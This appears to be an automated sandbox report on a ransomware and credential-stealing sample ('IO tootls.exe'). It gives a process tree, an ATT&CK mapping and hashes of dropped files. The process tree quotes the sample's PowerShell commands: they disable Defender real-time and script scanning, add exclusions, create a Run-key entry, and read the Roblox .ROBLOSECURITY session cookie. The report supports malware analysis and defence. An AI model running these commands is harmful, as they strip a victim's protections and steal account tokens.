PID 2352 wrote to memory of 2412	2352	IO tootls.exe	80
PID 2352 wrote to memory of 2412	2352	IO tootls.exe	80
PID 4460 wrote to memory of 3676	4460	controllloader.exe	82
PID 4460 wrote to memory of 3676	4460	controllloader.exe	82
PID 2412 wrote to memory of 4648	2412	cmd.exe	84
PID 2412 wrote to memory of 4648	2412	cmd.exe	84
PID 2412 wrote to memory of 4648	2412	cmd.exe	84
PID 3412 wrote to memory of 1716	3412	systemload.exe	85
PID 3412 wrote to memory of 1716	3412	systemload.exe	85
PID 4460 wrote to memory of 2524	4460	controllloader.exe	88
PID 4460 wrote to memory of 2524	4460	controllloader.exe	88
PID 3412 wrote to memory of 3436	3412	systemload.exe	90
PID 3412 wrote to memory of 3436	3412	systemload.exe	90
PID 4460 wrote to memory of 1980	4460	controllloader.exe	92
PID 4460 wrote to memory of 1980	4460	controllloader.exe	92
PID 4460 wrote to memory of 2572	4460	controllloader.exe	94
PID 4460 wrote to memory of 2572	4460	controllloader.exe	94
PID 4460 wrote to memory of 4000	4460	controllloader.exe	96
PID 4460 wrote to memory of 4000	4460	controllloader.exe	96
PID 4460 wrote to memory of 4628	4460	controllloader.exe	99
PID 4460 wrote to memory of 4628	4460	controllloader.exe	99
PID 4460 wrote to memory of 4228	4460	controllloader.exe	101
PID 4460 wrote to memory of 4228	4460	controllloader.exe	101
PID 4460 wrote to memory of 2280	4460	controllloader.exe	103
PID 4460 wrote to memory of 2280	4460	controllloader.exe	103
PID 4460 wrote to memory of 3864	4460	controllloader.exe	105
PID 4460 wrote to memory of 3864	4460	controllloader.exe	105
PID 1496 wrote to memory of 4292	1496	MicrosoftEdgeCP.exe	112
PID 1496 wrote to memory of 4292	1496	MicrosoftEdgeCP.exe	112
PID 1496 wrote to memory of 4292	1496	MicrosoftEdgeCP.exe	112
PID 1496 wrote to memory of 4292	1496	MicrosoftEdgeCP.exe	112

C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
"C:\Users\Admin\AppData\Local\Temp\IO tootls.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee' -Value '"C:\Windows\.NET\netloader.exe"' -PropertyType 'String'
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1564
- C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
  #cmd
  2⤵
  PID:308
- C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
  #cmd
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Users\Admin\AppData\Local\Temp\systemload.exe
    "C:\Users\Admin\AppData\Local\Temp\systemload.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3436
- - C:\Users\Admin\AppData\Local\Temp\controllloader.exe
    "C:\Users\Admin\AppData\Local\Temp\controllloader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\controllloader.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2572
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:4000
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:4628
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2280
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4648

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2448

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IO tootls.exe.log

Filesize
321B

MD5
d96cb6a55eb71b30f2e8a725ef5e6e5d

SHA1
f0bef03d7f37dfee965c6dfe4f6f447e3ab34be0

SHA256
253f84939770e1b5663cecd7df61bb04c1668c1a5f90a6dd2b95ea6830f8977b

SHA512
e65e8ee91233d4179beff6d381c07a600a0905710feaa063d9880c48646bd296137efdf628caecb8ccecec20162c2c952e9713d1d629788a37f1afba09bf4b77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3f7849f62ded6575df2ee37c7f5568bd

SHA1
39f86016d9a5d6c5c913f4e3e5540866514abcb3

SHA256
2769ca209546835c25b11cec75f4a6bdd6d814aa42b1019b6ff61af5347b9527

SHA512
202d548a450758f6b738fe33adfa59acdfcf1cb46cdfafa48bdbb3d969b23d6541104d5a5e18841a8f29c515576ac41269d99bd1f5d067b80152ebe0e6b2bded

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0YZH0870\edgecompatviewlist[1].xml

Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1103370b6188293ba9056eb2fa408d2c

SHA1
a7943c0397a0f4defd920a286a3f5825ef011b4c

SHA256
72a68b5741c4849caa8b16b7e9243e4b46f84ebd616a2d153de9580357d04e1b

SHA512
09b9764a9d84a3f4ca9f9223f90f27473e767b00811a2b781b194aa6af89433bf606e81186a4acc8a8fcb534c2afdfe6c6f4636431734b4893a7556bffc7ba47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
9e9b712791fb5be54bf508462a21fba8

SHA1
b7f912f80eb10cde01075901989fb887c3304b71

SHA256
951cc1b080fee82e79981b0cd87f76e0cdbb9b438cf71aed3318fea0d5e09ba7

SHA512
4b8a36b3d4d9833577dc50e25d00bbf50eaea1c3469516ae22b7afb073da7c58a7bdb18f0a2bf8757ef1a3a5b6c039db56f1f0fb52145f91487ed67816e80dbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37a353f3cc1a4ebc794dadb4c4263be8

SHA1
4cd8e43763fde93a64e2ef67a431605ee85b93e3

SHA256
691be776e31121cfc16b76419ebc7c7418783dd90009e8cf8360a732b61ba041

SHA512
64b3e84f62266b0967bd235a34e53be0a89fe1b68a5e7bd298438064d390a45efb35d9bac4de91141182dc70d537959c42c7ca5b7ac333af59c69ff6b3882a47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1993be96bde492b3120dd3eeadc41400

SHA1
2944bd67745e19deb8dfc51f2ecb5a7a35a65c29

SHA256
11d7de95ca20851734ba2ea2193e76018002890082a0437d4b8cb12a21e59ca4

SHA512
14bd25ffcd0aef4a1e8f01525587978e0462ce7c0be8aea92c399b9fdecb5dcb513e738cceb69b45fb64aec9ea1e45bcdaf8b11c8bb7e8c2cf0dd26ca7d675af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2efe13b09a24d27f38d4ba048f2b9917

SHA1
b86e0b30cf40d9b034a15c094f5e40c965e4036b

SHA256
854b3de05c910afcc97951741f4f0b5fa98b5380ac9ef97f439e5204169aebf2

SHA512
578ac33662bbeacb19ff1e02ea7c61ba9bdb1eab71a67df4120589152b52ffe08cd54b16923c067b3f688aafe4cc6cf4c851e15337a64bb63f6bd4ebaa2c9dfc

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\9FLNAQ9N\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzr2q2hc.ghw.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\controllloader.exe

Filesize
286KB

MD5
e41a0fa0c1e39af92d22090d4df61a1f

SHA1
c971a4089b1ab116c34b5ab0dc54d9977f86e834

SHA256
c0966533c2bc8c8b9ee176d774eae0ca1c4d6fe6e8efe5d87d4cac8c04b84372

SHA512
d42798fa9115f3c3775798a26ef7c28e4f173bdc2b74884b01a4e7905b17a2da09508766a626652eec3622a15a891b6859f4e9a422eb052a59b3fd3eafe1a7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\start.cmd

Filesize
93B

MD5
f960abd9684a879e8eca03b8c864ea96

SHA1
fb4b9a9b40af84ae46b70bb40ac3e1f45e4b4ad3

SHA256
7389178da21f4e2d4ef73ab199b7beeb97247a6c1afec3f3c48a7f561cbfaf90

SHA512
2c6267ab25c364c5b13059ed593bb47dfae586ae7b1411634efa3f45aaf07b4d8f491fe93bfd34482a1250c955f1e8c27e1afa0460672a5e9584ebe007ab2054

Download Submit
C:\Users\Admin\AppData\Local\Temp\systemload.exe

Filesize
130KB

MD5
352a162df9ca5605e1a1910c7a24cb7c

SHA1
4b4ed1c740a03c15eb47d875b65c76941debcaf7

SHA256
87e9d9a7a197a0cd483f8e73f307af53a7518cabc001257c8235743181b9a7b8

SHA512
0c2bae3f66748cc3448eaf60c5079ae3afba6d585e19e54857f7c152a1bd69c3b8e3df7feb413f3eb2df0f2bc01b44be5bcdefd5427af154a221f2b808a2399d

Download Submit
C:\Users\Admin\Desktop\How To Decrypt My Files.html

Filesize
639B

MD5
d2dbbc3383add4cbd9ba8e1e35872552

SHA1
020abbc821b2fe22c4b2a89d413d382e48770b6f

SHA256
5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be

SHA512
bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

Download Submit
C:\Users\Admin\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
56cd22352ce1a61a9f57b907510f4f79

SHA1
9aa651e30f74255bf55da7698efccdb0c8a660eb

SHA256
92e5a12a76384b1e88667a3fbf02f8c5a0e00a843792e407d171e604e8e98e7a

SHA512
9588576f876c51251b745b9cb6673669d575eb7b7d182bae5c84ace1ebf8647204f9f3a87e230d4186e82a590dbddd9e8b6f5c3075aa3b08c0303dae0d4a31c7

Download Submit
memory/1564-95-0x0000000070330000-0x000000007037B000-memory.dmp

Filesize
300KB

Download
memory/1564-15-0x00000000041E0000-0x00000000041F0000-memory.dmp

Filesize
64KB

Download
memory/1564-24-0x0000000007420000-0x000000000743C000-memory.dmp

Filesize
112KB

Download
memory/1564-25-0x0000000007440000-0x000000000748B000-memory.dmp

Filesize
300KB

Download
memory/1564-26-0x0000000007CC0000-0x0000000007D36000-memory.dmp

Filesize
472KB

Download
memory/1564-113-0x00000000090C0000-0x0000000009154000-memory.dmp

Filesize
592KB

Download
memory/1564-19-0x0000000007640000-0x0000000007990000-memory.dmp

Filesize
3.3MB

Download
memory/1564-111-0x00000000041E0000-0x00000000041F0000-memory.dmp

Filesize
64KB

Download
memory/1564-18-0x0000000007500000-0x0000000007566000-memory.dmp

Filesize
408KB

Download
memory/1564-108-0x00000000041E0000-0x00000000041F0000-memory.dmp

Filesize
64KB

Download
memory/1564-17-0x0000000007490000-0x00000000074F6000-memory.dmp

Filesize
408KB

Download
memory/1564-103-0x0000000008E70000-0x0000000008F15000-memory.dmp

Filesize
660KB

Download
memory/1564-96-0x0000000008D10000-0x0000000008D2E000-memory.dmp

Filesize
120KB

Download
memory/1564-93-0x0000000008D30000-0x0000000008D63000-memory.dmp

Filesize
204KB

Download
memory/1564-92-0x000000007F110000-0x000000007F120000-memory.dmp

Filesize
64KB

Download
memory/1564-16-0x0000000007210000-0x0000000007232000-memory.dmp

Filesize
136KB

Download
memory/1564-8-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/1564-10-0x0000000004150000-0x0000000004186000-memory.dmp

Filesize
216KB

Download
memory/1564-9-0x00000000041E0000-0x00000000041F0000-memory.dmp

Filesize
64KB

Download
memory/1564-584-0x0000000008F90000-0x0000000008FAA000-memory.dmp

Filesize
104KB

Download
memory/1564-70-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/1564-14-0x0000000006B70000-0x0000000007198000-memory.dmp

Filesize
6.2MB

Download
memory/1564-599-0x0000000008F80000-0x0000000008F88000-memory.dmp

Filesize
32KB

Download
memory/1564-75-0x00000000041E0000-0x00000000041F0000-memory.dmp

Filesize
64KB

Download
memory/1716-171-0x0000024F6A260000-0x0000024F6A270000-memory.dmp

Filesize
64KB

Download
memory/1716-349-0x0000024F6A260000-0x0000024F6A270000-memory.dmp

Filesize
64KB

Download
memory/1716-169-0x0000024F6A260000-0x0000024F6A270000-memory.dmp

Filesize
64KB

Download
memory/1716-287-0x0000024F6A260000-0x0000024F6A270000-memory.dmp

Filesize
64KB

Download
memory/1716-156-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/2352-20-0x0000000004D90000-0x0000000004E2C000-memory.dmp

Filesize
624KB

Download
memory/2352-7-0x0000000000400000-0x0000000000436000-memory.dmp

Filesize
216KB

Download
memory/2352-55-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/2352-12-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/2352-23-0x0000000000C00000-0x0000000000C10000-memory.dmp

Filesize
64KB

Download
memory/2448-1069-0x0000026F5ABF0000-0x0000026F5ABF2000-memory.dmp

Filesize
8KB

Download
memory/2448-1114-0x0000026F612B0000-0x0000026F612B1000-memory.dmp

Filesize
4KB

Download
memory/2448-1115-0x0000026F612C0000-0x0000026F612C1000-memory.dmp

Filesize
4KB

Download
memory/2448-1050-0x0000026F5B200000-0x0000026F5B210000-memory.dmp

Filesize
64KB

Download
memory/3412-165-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/3412-42-0x00000000004B0000-0x00000000004D6000-memory.dmp

Filesize
152KB

Download
memory/3412-53-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/3676-105-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-78-0x000002351DCD0000-0x000002351DD46000-memory.dmp

Filesize
472KB

Download
memory/3676-66-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-208-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-67-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-261-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-68-0x000002351DB20000-0x000002351DB42000-memory.dmp

Filesize
136KB

Download
memory/3676-269-0x000002351DAE0000-0x000002351DAF0000-memory.dmp

Filesize
64KB

Download
memory/3676-64-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/3676-195-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/4292-1093-0x000001C27D450000-0x000001C27D452000-memory.dmp

Filesize
8KB

Download
memory/4292-1088-0x000001C27D360000-0x000001C27D362000-memory.dmp

Filesize
8KB

Download
memory/4292-1095-0x000001C27D470000-0x000001C27D472000-memory.dmp

Filesize
8KB

Download
memory/4292-1091-0x000001C27D390000-0x000001C27D392000-memory.dmp

Filesize
8KB

Download
memory/4460-56-0x000001F028CF0000-0x000001F028D00000-memory.dmp

Filesize
64KB

Download
memory/4460-167-0x000001F028CF0000-0x000001F028D00000-memory.dmp

Filesize
64KB

Download
memory/4460-57-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/4460-48-0x000001F00E810000-0x000001F00E85E000-memory.dmp

Filesize
312KB

Download
memory/4460-193-0x00007FFF206F0000-0x00007FFF210DC000-memory.dmp

Filesize
9.9MB

Download
memory/4620-0-0x0000000000C60000-0x0000000000C9A000-memory.dmp

Filesize
232KB

Download
memory/4620-13-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/4620-2-0x0000000005970000-0x0000000005E6E000-memory.dmp

Filesize
5.0MB

Download
memory/4620-1-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/4620-4-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/4648-266-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/4648-72-0x0000000073910000-0x0000000073FFE000-memory.dmp

Filesize
6.9MB

Download
memory/4648-73-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/4648-76-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/4648-347-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/4648-210-0x0000000004BF0000-0x0000000004C00000-memory.dmp

Filesize
64KB

Download
memory/4648-199-0x000000007E810000-0x000000007E820000-memory.dmp

Filesize
64KB

Download
memory/4648-191-0x0000000070330000-0x000000007037B000-memory.dmp

Filesize
300KB

Download